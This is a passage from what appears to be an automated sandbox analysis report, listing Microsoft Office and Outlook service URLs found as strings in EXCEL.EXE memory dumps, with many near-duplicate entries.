    Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.com&
    Source: EXCEL.EXE, 00000001.00000002.753233650.000000000F2D0000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.com0bOi
    Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comD
    Source: EXCEL.EXE, 00000001.00000002.754502820.00000000129FF000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comId(
    Source: EXCEL.EXE, 00000001.00000003.620001254.000000000F47D000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comN
    Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comP
    Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comZ
    Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comb
    Source: EXCEL.EXE, 00000001.00000002.754502820.00000000129FF000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.come
    Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comh
    Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comt
    Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://officeci.azurewebsites.net/api/
    Source: EXCEL.EXE, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
    Source: EXCEL.EXE, 00000001.00000002.754897882.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660254465.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.738795485.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.601531308.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289286361.0000000012B76000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620631853.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599092509.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.291961394.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564407313.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.623747505.0000000012B6C000.00000004.00000001.sdmpString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks#d
    Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
    Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
    Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.754583225.0000000012A70000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
    Source: EXCEL.EXE, 00000001.00000003.604153523.000000000F2F0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.622581671.000000000F2EF000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.565377395.000000000F2FA000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.619496038.000000000F2EF000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.618391633.000000000F2EF000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.753326969.000000000F2F0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.754583225.0000000012A70000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599684580.000000000F2F9000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
    Source: EXCEL.EXE, 00000001.00000003.604153523.000000000F2F0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.622581671.000000000F2EF000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.565377395.000000000F2FA000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.619496038.000000000F2EF000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.618391633.000000000F2EF000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.753326969.000000000F2F0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.754583225.0000000012A70000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599684580.000000000F2F9000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentities
    Source: EXCEL.EXE, 00000001.00000003.604153523.000000000F2F0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.622581671.000000000F2EF000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.565377395.000000000F2FA000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.619496038.000000000F2EF000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.618391633.000000000F2EF000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.753326969.000000000F2F0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.754583225.0000000012A70000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599684580.000000000F2F9000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentitiesupdated
    Source: 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://onedrive.live.com
    Source: EXCEL.EXE, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
    Source: EXCEL.EXE, 00000001.00000002.754897882.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660254465.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.738795485.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.601531308.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289286361.0000000012B76000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620631853.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599092509.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.291961394.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564407313.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.623747505.0000000012B6C000.00000004.00000001.sdmpString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=falsebd
    Source: EXCEL.EXE, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://onedrive.live.com/embed?
    Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmpString found in binary or memory: https://onedrive.live.com/embed?i
    Source: EXCEL.EXE, 00000001.00000002.751546889.000000000D65A000.00000004.00000001.sdmpString found in binary or memory: https://onedrive.live.comOneDriveLogUploadServicehttps://storage.live.com/clientlogs/uploadlocationM
    Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.754583225.0000000012A70000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://osi.office.net
    Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmpString found in binary or memory: https://osi.office.net)v
    Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmpString found in binary or memory: https://osi.office.netEv
    Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmpString found in binary or memory: https://osi.office.netst
    Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://otelrules.azureedge.net
    Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://outlook.office.com
    Source: EXCEL.EXE, 00000001.00000002.751574667.000000000D65E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289495071.0000000012AA6000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://outlook.office.com/
    Source: EXCEL.EXE, 00000001.00000003.622996638.000000000F47D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564819624.000000000F47E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599473071.000000000F47E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.754138462.000000000F47D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292418003.000000000F47D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.741498759.000000000F47D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.618708910.000000000F47D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.604793944.000000000F47D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620001254.000000000F47D000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
    Source: EXCEL.EXE, 00000001.00000002.754502820.00000000129FF000.00000004.00000001.sdmpString found in binary or memory: https://outlook.office.comW
    Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmpString found in binary or memory: https://outlook.office.comiUrlt?
    Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmpString found in binary or memory: https://outlook.office.coms
    Source: EXCEL.EXE, 00000001.00000002.754502820.00000000129FF000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://outlook.office365.com
    Source: EXCEL.EXE, 00000001.00000002.754502820.00000000129FF000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751574667.000000000D65E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289495071.0000000012AA6000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://outlook.office365.com/
    Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754583225.0000000012A70000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
    Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmpString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities/
    Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.754583225.0000000012A70000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: 